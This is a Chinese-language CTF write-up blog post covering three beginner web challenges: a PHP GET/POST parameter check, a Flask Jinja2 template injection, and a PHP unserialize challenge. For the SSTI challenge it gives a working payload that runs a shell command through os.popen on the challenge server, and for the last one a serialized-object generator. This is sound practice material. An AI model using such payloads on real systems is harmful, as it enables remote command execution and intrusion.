发布日期: 2024-12-05

？要不？学点web？

orz一个队四个人，常常因为没学过web和大家格格不入，这里简单写几个web类型，（qwq（至少刚开始打CTF是因为学姐是学web的所以学了一段时间web（

pwn日活达标了就学web，实在都不想看就去搓逆向。（逆向，哭了

不管怎么说，反正我要学（

[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

post传id，get传json

[HNCTF 2022 WEEK2]ez_SSTI

很贴心的给了ssti相关链接：

WELCOME TO HNCTF
What is server-side template injection?
None

1	http://node5.anna.nssctf.cn:23663/?name={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

from flask import Flask,render_template,render_template_string,redirect,request,session,abort,send_from_directory import os import re app = Flask(__name__) @app.route("/") def app_index(): name = request.args.get('name') blacklist = [] if name: for no in blacklist: if no in name: return 'Hacker' template = '''{%% block body %%} <div class="center-content error"> <h1>WELCOME TO HNCTF</h1> <a href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#python" id="test" target="_blank">What is server-side template injection?</a> <h3>%s</h3> </div> {%% endblock %%} ''' % (request.args.get('name')) return render_template_string(template) if __name__=="__main__": app.run(host='0.0.0.0',port=80)

[SWPUCTF 2021 新生赛]ez_unserialize

扫描得到robots.txt

指引去另一个页面：（？看起来是php框架的（问题不大）

PHP调用unserialize()时，会触发魔术方法__wakeup()和__destruct()

<?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}
$aa = new wllm();
$aa->admin = "admin";
$aa->passwd = "ctf";
$stus = serialize($aa);
print_r($stus);
?>